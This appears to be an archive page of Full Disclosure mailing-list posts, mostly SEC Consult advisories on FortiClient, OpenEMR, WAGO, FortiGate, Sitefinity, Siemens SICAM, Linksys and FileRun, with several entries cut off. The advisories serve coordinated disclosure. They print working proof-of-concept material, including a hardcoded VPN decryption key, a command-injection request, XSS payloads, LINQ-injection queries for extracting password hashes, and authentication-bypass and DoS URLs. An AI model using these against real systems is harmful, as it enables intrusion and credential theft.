 vulnerable version: <4.4.2335 on Linux, <5.6.1 on Windows,
 <5.6.1 on Mac OSX
  fixed version: 4.4.2335 on Linux, 5.6.1 on Windows, 5.6.1 on Mac OS X
 CVE number: CVE-2017-14184
 impact: High
   homepage: https://www.fortinet.com/ | http://forticlient.com/
  found: 2017-08-29
 by: M. Li (Office Singapore)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Business recommendation:

The patched FortiClient versions should be installed immediately as the VPN
credentials could be decrypted by an attacker.


Vulnerability overview/description:
---
FortiClient stores the VPN authentication credentials in a configuration file
(on Linux or Mac OSX) or in registry (on Windows). The credentials are
encyrpted but can still be recovered since the decryption key is hardcoded
in the program and the same on all installations. Above all, the aforementioned
storage is world readable, which actually lays the foundation for the
credential recovery.


Proof of concept:
-
1) Hardcoded key
The hardcoded key can be disclosed on the Linux version by issuing the following
command:
$ strings forticlientsslvpn |grep "fc_1A"
fc_1A2Brown3Fox4Jumped5Over6A7Lazy8Dog

The same decryption key can be found in the Windows and Mac OSX binary.


2) Overly permissive access control
The read access of the configuration file is set for "others" too, making the 
file
world-readable. On Mac OSX, the file can be found under
/Library/Application Support/Fortinet/FortiClient/conf/vpn.plist
while the same dataset is stored in the registry key
HKLM\SOFTWARE\WOW6432Node\Fortinet\FortiClient\Sslvpn\Tunnels
on Windows, which is world-readable for all users as well.

$ ls -l /home/user/.fctsslvpnhistory
-rw-rw-rw- 1 root root 1227 Aug 23 12:26 .fctsslvpnhistory
$ cat /home/user/.fctsslvpnhistory
...
profile=demo
p12passwdenc=Enc 420d2ee65abded897a69c50f4995397969f1c1f949055d8e51
path=
passwordenc=Enc
420d2ee65abded897a69c50f49956909f61e3e549873cdfecf12bafdfa7b78f789a17ba1a5a6c9eb1803
user=li
port=443
server=server.com
...


Combining the two issues, an attacker can steal the password of any user who
has a FortiClient profile on the system. In an enterprise environment, where
employees usually log onto VPN server with their domain credentials, a vicious
employee can extensively harvest the credentials of colleagues by logging onto 
the
workstation where the credentials have been stored. Hence an attacker might
steal credentials of any user in the domain and gain access to their user 
account
(e.g. emails, other private data).


SEC Consult developed a proof of concept tool which takes as input the encrypted
string, and prints the decrypted hexdecimal bytes followed by the recovered
password. For now, this tool will not be released to give users more time to
patch.


$ kr
420d2ee65abded897a69c50f49956909f61e3e549873cdfecf12bafdfa7b78f789a17ba1a5a6c9eb1803
0x50  0x61  0x73  0x73  0x77  0x6f  0x72  0x64
0x52  0x65  0x63  0x6f  0x76  0x65  0x72  0x65
0x64  0x00
PasswordRecovered


The advisory on our website also contains further detailed technical information
with screenshots:
https://www.sec-consult.com/en/blog/advisories/vpn-credentials-disclosure-in-fortinet-forticlient/index.html


Vulnerable / tested versions:
-
The vulnerabilities have been identified in version 4.4.2332 on Linux, version
5.6.0.1075 on Windows as well as version 5.6.0.703 on Mac OSX, which were the
latest version of the product at the audit time to our best knowledge.


Vendor contact timeline:

2017-08-30: Contacting vendor through ps...@fortinet.c

Re: [FD] Edward Snowden free speech at JBFone - Future, Data Security & Privacy

2017-12-05 Thread Vulnerability Lab 
UPDATE

Reference(s):
http://www.focus.de/digital/handy/iphone/apple-edward-snowden-warnt-vor-iphone-x-besonders-eine-funktion-ist-gefaehrlich_id_7921720.html
http://www.chip.de/news/Beruehmtester-Hacker-der-Welt-warnt-Im-iPhone-X-steckt-eine-gefaehrliche-Funktion_128162181.html
http://www.t-online.de/digital/handy/id_82783158/iphone-x-edward-snowden-warnt-vor-apples-face-id.html
https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html
https://www.netzwelt.de/news/162899-edward-snowden-muenchen-vorsicht-face-id-iphone-x.html
http://www.augsburger-allgemeine.de/digital/Fehler-in-iOS-Apple-empfiehlt-Nutzern-ein-Update-auf-iOS-11-2-id42863076.html
https://www.derstandard.de/story/268413551/snowden-warnt-vor-dem-iphone-x
http://www.finanzen.net/nachricht/aktien/datenschutz-gefaehrliche-funktion-whistleblower-edward-snowden-warnt-vor-apples-supersmartphone-5835184
https://www.nzz.ch/digital/snowden-warnt-vor-gesichtserkennung-ld.1332209
http://winfuture.de/news,100724.html
http://www.chip.de/news/Beruehmtester-Hacker-der-Welt-warnt-Im-iPhone-X-steckt-eine-gefaehrliche-Funktion_128162181.html
http://www.silicon.de/41663743/iphone-x-snowden-kritisiert-freigabe-von-face-id-fuer-entwickler/?inf_by=5a1d649b681db8db1e8b49ee
http://www.zdnet.de/88319443/iphone-x-snowden-kritisiert-freigabe-von-face-id-fuer-entwickler/
https://curved.de/news/iphone-x-snowden-findet-face-id-freigabe-fuer-entwickler-unverantwortlich-552267
https://utopia.de/edward-snowden-iphone-x-datenschutz-71335/
https://www.appticker.de/news/smartphone-news/edward-snowden-face-id-fuer-entwickler-freizugeben-war-ein-fehler-7994.html
https://apfeleimer.de/2017/11/snowden-die-face-id-gehoert-nicht-in-entwicklerhaende-video
http://www.netz-trends.de/id/7896/Edward-Snowden-warnt-vor-Gesichtserkennungssoftware-im-iPhone-X/
http://www.giga.de/smartphones/iphone-x/news/iphone-x-deshalb-warnt-edward-snowden-vor-dem-apple-handy/
http://www.manager-magazin.de/unternehmen/it/iphone-x-edward-snowden-warnt-vor-face-id-a-1180482.html
http://www.connect.de/news/iphone-x-face-id-snowden-warnt-missbrauch-3197965.html
http://seclists.org/fulldisclosure/2017/Nov/38
https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy

#security #infosec #privacy #freespeech

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20171130-1 :: OS Command Injection & Reflected Cross Site Scripting in OpenEMR

2017-12-02 Thread SEC Consult Vulnerability Lab 

SEC Consult Vulnerability Lab Security Advisory < 20171130-1 >
===
  title: OS Command Injection & Reflected Cross Site Scripting
product: OpenEMR
 vulnerable version: 5.0.0
  fixed version: 5.0.0 Patch 2 or higher
 CVE number: -
 impact: Critical
   homepage: http://www.open-emr.org/
  found: 2017-03-03
 by: Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"OpenEMR is the most popular open source electronic health records and medical
practice management solution. ONC certified with international usage,
OpenEMR's goal is a superior alternative to its proprietary counterparts."

Source: http://www.open-emr.org/


Business recommendation:

By exploiting the vulnerability documented in this advisory, an attacker can
fully compromise the web server which has OpenEMR installed. Potentially
sensitive health care and medical data might get exposed through this attack.

SEC Consult recommends not to attach OpenEMR to the network until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1. OS Command Injection
Any OS commands can be injected by an authenticated attacker with any role.
This is a serious vulnerability as the chance for the system to be fully
compromised is very high.

2. Reflected Cross Site Scripting
This vulnerability allows an attacker to inject malicious client side
scripting which will be executed in the browser of users if they visit the
manipulated site. There are different issues affecting various components.
The flash component has not been fixed yet as OpenEMR is looking for a
replacement component.


Proof of concept:
-
1. OS Command Injection
Below is the detail of a HTTP request that needs to be sent to execute arbitrary
OS commands through "fax_dispatch.php".

URL : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=x
METHOD  : POST
PAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_
filename=''&form_pid=1


2. Reflected Cross Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross site scripting:

The following payload shows a simple alert message box:
a)
URL : http://$DOMAIN/library/openflashchart/open-flash-chart.swf
METHOD  : GET
PAYLOAD : [PoC removed as no fix is available]

b)
URL :
http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.php
METHOD  : POST
PAYLOAD : alert('xss');=SENDF


Vulnerable / tested versions:
-
OpenEMR version 5.0.0 has been tested. This version was the latest
at the time the security vulnerability was discovered.


Vendor contact timeline:

2017-03-08: Contacting vendor through email.
2017-03-08: Vendor replied with his public key. Advisory sent through secure
channel.
2017-03-17: Asked for a status update from the vendor.
2017-03-17: Vendor confirms the vulnerabilities and working on the fixes.
2017-03-31: Asked for a status update from the vendor.
2017-03-31: Vendor informed that they have fixed OS Command Injection and are
currently working on fixes for Reflected Cross Site Scripting.
2017-04-25: Vendor requesting extension for deadline of 32 days from the
latest possible release date.
2017-05-25: Asked for a status update from the vendor.
2017-05-29: Vendor informed that they are working on the fixes.
2017-06-06: Asked for a status update from the vendor.
2017-06-12: Vendor informed that they added solution into the development
codebase.
2017-07-05: Asked for a status update from the vendor.
2017-07-10: Vendor informed patch is delayed due to another critical bug
fixes.
2017-08-17: Asked for a status update from the vendor. No reply.
2017-08-24: Asked for a status update from the vendor.
2017-08-29: Vendor informed patch will be out soon.
2017-08-30: Asked vendor for specific release date for patch. No reply.
2017-09-08: Asked for a status update from the vendor. No reply.
2017-09-14: Asked for a status update from the vendor.
2017-09-18: Vendor informed that they are testing their patch. No estimation

[FD] SEC Consult SA-20171130-0 :: Critical CODESYS vulnerabilities in WAGO PFC 200 Series

2017-12-02 Thread SEC Consult Vulnerability Lab 

SEC Consult Vulnerability Lab Security Advisory < 20171130-0 >
===
  title: Critical CODESYS vulnerabilities
product: WAGO PFC 200 Series, see "Vulnerable / tested versions"
 vulnerable version: plclinux_rt 2.4.7.0, see "Vulnerable / tested versions"
  fixed version: PFC200 FW11
 CVE number: -
 impact: critical
   homepage: https://www.codesys.com
  found: 2017-07-28
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"The WAGO-I/O-SYSTEM is a flexible fieldbus-independent solution for
decentralized automation tasks. With the relay, function and interface
modules, as well as overvoltage protection, WAGO provides a suitable interface
for any application."

Source: http://global.wago.com/en/products/product-catalog/
components-automation/overview/index.jsp

"The PFC family of controllers offers advanced compact, computing power for PLC
programming and process visualization. Programmable in accordance with IEC 
61131-3
600, PFC controllers feature a 600 MHz ARM Cortex A8 processor that offers high
speed processing and support of 64 bit variables."

Source:
http://www.wago.us/products/components-for-automation/modular-io-system-series-750-753/programmable-fieldbus-controller/pfc200/index.jsp



Business recommendation:

Because of the use in industrial and safety-critical environments the patch has
to be applied as soon as it is available. We explicitly point out to all users
in this sector that this device series in the mentioned device series with
firmware 02.07.07(10) should not be connected directly to the internet (or even
act as gateway) since it is very likely that an attacker can compromise the
whole network via such an device.

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals.


Vulnerability overview/description:
---
The "plclinux_rt" service accepts different unauthenticated actions.

This vulnerability contains the architectural security problems described by
Reid Wightman. The SDK of "plclinux_rt" is written by the same vendor (3S).
Therefore, the file commands of "Digital Bond's 3S CODESYS Tools", created
around 2012 are applicable.
(See https://ics-cert.us-cert.gov/advisories/ICSA-13-011-01)

The CODESYS command-line is protected with login credentials, that's why the
shell of the mentioned tools does not provide root access out of the box. But
after some investigation it was clear that there are further functions which
are reachable without using the command-line and without any authentication.

These functions in "plclinux_rt" can be triggered by sending the correct
TCP payload on the bound port (by default 2455).

Some of the triggerable functions are:
* Arbitrary file read/write/delete (also covered by "Digital Bond's Tools")
* Step over a function in the currently executed PLC program
* Cycle step any function in the currently executed PLC program
* Delete the current variable list of the currently executed PLC program
* And more functions...

Since SSH is activated by default, an unauthenticated attacker can rewrite
"/etc/shadow" and gain root privileges easily via these attack vectors!


1) Critical Improper Authentication / Design Issue
Files can be fetched, written and deleted. Running tasks on the PLC can be
restarted, stepped and crashed.

An attacker can therefore replace the password hash in the shadow file. A
memory corruption (and potential reverse-shell) is also possible via arbitrary
TCP packets.

There are potentially more commands which can be triggered, but this was not
covered by the short security crash test.


Proof of concept:
-
As there is no patch available yet, the detailed proof of concept information 
has
been removed from this advisory.

1) Critical Improper Authentication / Design Issue
Two payloads are specified here as proof of concept for file manipulation.
Four payloads for live program manipulation are also listed.

File read and delete without any authentication.

Read "/etc/shadow":
echo '[PoC removed]' | xxd -r -p | nc  

Delete "/etc/test":
echo '[PoC removed]' | xxd -r -p | nc  

Runnning PLC tasks could be modified with the following payloads:

Step over functi

[FD] SEC Consult SA-20171129-0 :: FortiGate SSL VPN Portal XSS Vulnerability

2017-12-02 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171129-0 >
===
  title: FortiGate SSL VPN Portal XSS Vulnerability
product: Fortinet FortiOS
 vulnerable version: see: Vulnerable / tested versions
  fixed version: see: Solution
 CVE number: CVE-2017-14186
 impact: Medium
   homepage: https://www.fortinet.com
  found: 2017-10-02
 by: Stefan Viehböck (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Vulnerability overview/description:
---
The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS)
vulnerability. The HTTP GET parameter "redir" is vulnerable.
An attacker can exploit this vulnerability by tricking a victim to visit a URL.
The attacker is able to hijack the session of the attacked user, and use this
vulnerability in the course of spear-phishing attacks, e.g. by displaying a
login prompt that sends credentials of victim back to the attacker.

Note: This vulnerability is also an open redirect and is very similar to a
vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004).
https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability


Proof of concept:
-
The following request exploits the issue:
https://vpn..com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location)


The server responds with a page that looks as follows:
---


document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29");


---


Vulnerable / tested versions:
-
FortiOS 5.6.0 -> 5.6.2
FortiOS 5.4.0 -> 5.4.6
FortiOS 5.2.0 -> 5.2.12
FortiOS 5.0 and below

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242


Vendor contact timeline:

2017-10-02: Contacting vendor through ps...@fortinet.com
2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix 
in
version 5.6.3
2017-11-23: Vendor provides update
2017-11-29: Coordinated public release of advisory


Solution:
-
FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th)
FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA 
Dec
7th)
FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA:
Dec 14th)

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242


Workaround:
---
Not available.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices http

[FD] Edward Snowden free speech at JBFone - Future, Data Security & Privacy

2017-11-23 Thread Vulnerability Lab 
Title: Edward Snowden free speech at JBFone - Future, Data Security &
Privacy

Article:
https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy

Video: https://www.youtube.com/watch?v=JF45xq0W15c

Press:
https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20171116-0 :: Broken access control & LINQ injection in Progress Sitefinity

2017-11-16 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171116-0 >
===
  title: Broken access control & LINQ injection
product: Progress Sitefinity
 vulnerable version: 10.0, 10.1
  fixed version: >=10.1.6527.0 (internal build), 10.2
 CVE number: -
 impact: High
   homepage: http://www.sitefinity.com | https://www.progress.com
  found: 2017-08-21
 by: M. Li (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===


Vendor description:
---
"Progress Sitefinity is a content management and marketing analytics
platform designed to maximize the agility needed to succeed in today’s rapidly
changing digital marketplace.
It provides developers and IT teams the tools they need to support
enterprise-level digital marketing, optimizing the customer journey by
delivering seamless personalized experiences across different technologies and
devices. Progress is a trusted source for the digital marketing innovation
needed to create transformative customer experiences that fuel business
success."

Source: http://www.sitefinity.com/about


Business recommendation:

SEC Consult recommends applying the provided patches by the vendor immediately.

Additionally, there are strong indications for further vulnerabilities and it
is highly suggested to perform a thorough security review by security
professionals to lower the risk of using this product.


Vulnerability overview/description:
---
1) Broken Access Control
By using an unprotected function, a low privileged user can extract another
user's information such as email addresses, user ID, etc.


2) LINQ Injection
The identified LINQ injection enables an authenticated user to read sensitive
data from the database. Specifically, an attacker can query the password
or its hash character by character. Depending on the version of LINQ assembly
in use, remote code execution could be possible as well.

Combining the two issues, a user could escalate her privileges.


Proof of concept:
-
1) Broken Access Control
A user with a low privileged role e.g. "BackendUsers" can obtain other users'
information including email, userid etc., which is not intended for a user with
this role. The function disclosing the information is "GenericItemsService.svc"
laid under path "Common", which is in general not protected based on the role.

GET
/Sitefinity/Services/Common/GenericItemsService.svc/?itemType=Telerik.Sitefinity.Security.Model.User&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser
HTTP/1.1
Host: [host]
...snip...

HTTP/1.1 200 OK
...snip...
{
"Context":null,
"IsGeneric":false,
"Items":[
...snip...
{
...snip...
"Email":"te...@local.host",
...snip...

],
"UserID":"cb21e9a9-992c-4f8f-9800-b03c9639b02a"
}
],
"TotalCount":3
}


2) LINQ Injection
The aforementioned function "GenericItemsService.svc", which can be invoked by
any authenticated user regardless of her privilege, can be augmented by the
parameter "filter", narrowing down the user list. However, this parameter does
not undergo any sanitization hence properties like "password" can be queried
character by character.

For instance, the request in example 1 is asking the server whether any user
has the password containing "2klv". Upon a correct guess, the reply contains
matching users' attributes. By sending multiple such queries, an attacker can
deduce the user's password hash, salt, etc. In example 2, function "Users.svc"
can be used only by users with administrator privilege.

It could also be possible to extract the password in cleartext, if the default
setting for membership format is changed.

Furthermore, depending on the third party assembly System.Linq, the issue
could be abused to execute code on the server.


Example 1:
GET
/Sitefinity/Services/Common/GenericItemsService.svc/?itemType=Telerik.Sitefinity.Security.Model.User&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser&filter=(password.ToUpper().Contains(%222klv%22.ToUpper()))
HTTP/1.1

Example 2:
GET
/Sitefinity/Services/Security/Users.svc/?roleId=&roleProvider=&forAllProviders=false&filter=(salt.ToUpper().Contains(%225

[FD] SEC Consult SA-20171114-0 :: Authentication bypass, cross-site scripting & code execution in Siemens SICAM RTUs SM-2556 COM Modules

2017-11-14 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171114-0 >
===
  title: Authentication bypass, cross-site scripting & code
 execution
product: Siemens SICAM RTUs SM-2556 COM Modules
 (firmware variants ENOS00, ERAC00, ETA2, ETLS00,
 MODi00 and DNPi00
 vulnerable version: FW 1549 Revision 07
  fixed version: none, see Workaround section below
 CVE number: CVE-2017-12737 (authentication bypass)
 CVE-2017-12738 (XSS)
 CVE-2017-12739 (web server)
 impact: critical
   homepage: www.siemens.com
  found: 2017-08-17
 by: SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Siemens is a global powerhouse focusing on the areas of electrification,
automation and digitalization. One of the world's largest producers of
energy-efficient, resource-saving technologies, Siemens is a leading supplier
of systems for power generation and transmission as well as medical diagnosis."

Source: https://www.siemens.com/global/en/home/company/about.html


Business recommendation:

SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved. The device must not be accessible from
untrusted networks.


Vulnerability overview/description:
---
1) Authentication Bypass (client-side "authentication" enforcement)
The web interface (TCP port 80) suffers from an authentication bypass
vulnerability that allows unauthenticated attackers to access arbitray
functionality and information (i.e. password lists) available through
the webserver.


2) Reflected Cross-Site Scripting
The web interface provides a "ping" functionality. This form is
vulnerable to reflected cross-site-scripting because of missing input
handling and output encoding.


3) Outdated Webserver (GoAhead)
The used webserver version contains known weaknesses.


Proof of concept:
-
1) Authentication Bypass
Use a browser which has JavaScript disabled  ("Authentication" checks are
performed client-side) and open legitimate URLs directly.

Examples:
http:///start.asp
http:///pwliste.asp
http:///goform/webforms_readmem?start_addr=0&length=100


2) Reflected Cross-Site Scripting
All parameters in "webforms_ping" are vulnerable to reflected XSS:
http:///goform/webforms_ping?ip_address=1.1.1.com%3Cscript%3Ealert(%27XSS%20proof-of-concept%27)%3C/script%3E1&length_data=32&count_pings=4&timeout=1


3) Outdated Webserver
The used version of "GoAhead" webserver is 2.1.7 (released in Oct. 2003)
This version has known vulnerabilities:

http://aluigi.altervista.org/adv/goahead-adv3.txt
https://web.archive.org/web/20080314153252/http:/data.goahead.com:80/Software/Webserver/2.1.8/release.htm#bug-with-urls-like-asp



Vulnerable / tested versions:
-
SM-2556 COM Modules with the firmware variants ENOS00, ERAC00,
ETA2, ETLS00, MODi00 and DNPi00
(FW 1549 Revision 07)


Vendor contact timeline:

2017-09-25: Encrypted advisory sent to Siemens ProductCERT
2017-10-02: Requesting status update.
2017-10-09: Vendor states that the "affected device is out of service"
and provides workaround (disable webserver). They are
"still assessing the next steps".
2017-11-02: Requesting status update.
2017-11-06: Siemens ProductCERT will reach out to development team and keep us
posted.
2017-11-08: Siemens ProductCERT prepares advisory.
2017-11-08: Asking about planned release date.
2017-11-13: Siemens ProductCERT provides planned release date (2017-11-14)
2017-11-14: Coordinated public release.


Solution:
-
No firmware update is available as the device is no longer supported by
the vendor.


Workaround:
---
According to the vendor the webserver can be disabled to mitigate all
the vulnerabilities documented in this advisory.
The webserver is optional and only used for commissioning and debugging
purposes.

The vendor published the following document for further information:
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-164516.pdf


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~

[FD] SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products

2017-10-18 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
===
  title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
 vulnerable version: see "Vulnerable / tested versions"
  fixed version: no public fix, see solution/timeline
 CVE number: -
 impact: high
   homepage: http://www.linksys.com/
  found: 2017-06-26
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Today, Belkin International has three brands – Belkin, Linksys and WeMo
– to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."

Source: http://www.belkin.com/uk/aboutUs/


Business recommendation:

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.

A crafted GET request, e.g. triggered by CSRF over a user in the
internal network, can reboot the whole device or freeze the web interface
and the DHCP service. This action does not require authentication.

2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions. One example in this case is an open redirection
to another web site. In the worst case a session ID of an authenticated user
can be stolen this way because the session ID is embedded into the url
which is another flaw of the web service.

3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.

The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.

4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked by using 3) via LAN. An exploitation via internet
is only possible if the session id is exposed to the internet (for example via
the referrer).

An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.

5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked by using 3) via LAN. An exploitation via internet is only possible
if the session id is exposed to the internet (for example via the referrer).

By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.


Proof of concept:
-
1) Denial of Service

Unauthenticated request for triggering a router reboot in browser:
http:///upgrade.cgi
http:///restore.cgi

Unauthenticated request for triggering a router freeze in browser:
http:///mfgtst.cgi


2) HTTP Header Injection & Open Redirect

A header injection can be triggered by the following unauthenticated request:

Request:
--
POST /UnsecuredEnable.cgi HTTP/1.1
Host: 
Accept: */*
Accept-Language: en
Connection: close
Referer: http:///Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

[FD] SEC Consult SA-20171018-0 :: Multiple vulnerabilities in Afian AB FileRun

2017-10-18 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
===
  title: Multiple vulnerabilities
product: Afian AB FileRun
 vulnerable version: 2017.03.18
  fixed version: 2017.09.18
 impact: critical
   homepage: https://www.filerun.com | https://afian.se
  found: 2017-08-28
 by: Roman Ferdigg (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"FileRun File Manager: access your files anywhere through self-hosted
secure cloud storage, file backup and sharing for your photos, videos,
files and more. Upload and download large files for easy sharing. Google
Drive self-hosted alternative."

Source: https://www.filerun.com


Business recommendation:

By exploiting the vulnerabilities documented in this advisory, an attacker
can compromise the web server which has FileRun installed. User files might
get exposed through this attack.

SEC Consult recommends not to use FileRun until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.


Vulnerability overview/description:
---
1) Path Manipulation
When uploading, downloading or viewing files, FileRun uses a parameter to
specify the path on the file-system. An attacker can manipulate the value
of this parameter to read, create and even overwrite files in certain
folders. An attacker could upload malicious files to compromise the
webserver. In combination with the open redirect and CSRF vulnerability
even an unauthenticated attacker can upload these files to get a shell.
Through the shell all user files can be accessed.


2) Stored Cross Site Scripting (XSS) via File Upload
The application allows users to upload different file types. It is also
possible to upload HTML files or to create them via the application's text
editor. Files can be shared using a link or within the FileRun application
(in the enterprise version). An attacker can inject JavaScript in HTML
files to attack other users or simply create a phishing site to steal user
credentials.

Remark:
In the standard configuration of the FileRun docker image the HttpOnly
cookie flag is not set, which means that authentication cookies can be
accessed in an XSS attack. This allows easy session hijacking as well.


3) Cross Site Request Forgery (CSRF)
The application does not implement CSRF protection. An attacker can exploit
this vulnerability to execute arbitrary requests with the privileges of the
victim. The only requirement is that a victim visits a malicious webpage.
Such a page could be hosted on the FileRun server itself and shared with
other users as described in vulnerability 2.
Besides others, the following actions can be performed via CSRF if the
victim has administrative privileges:
 - Create or delete users
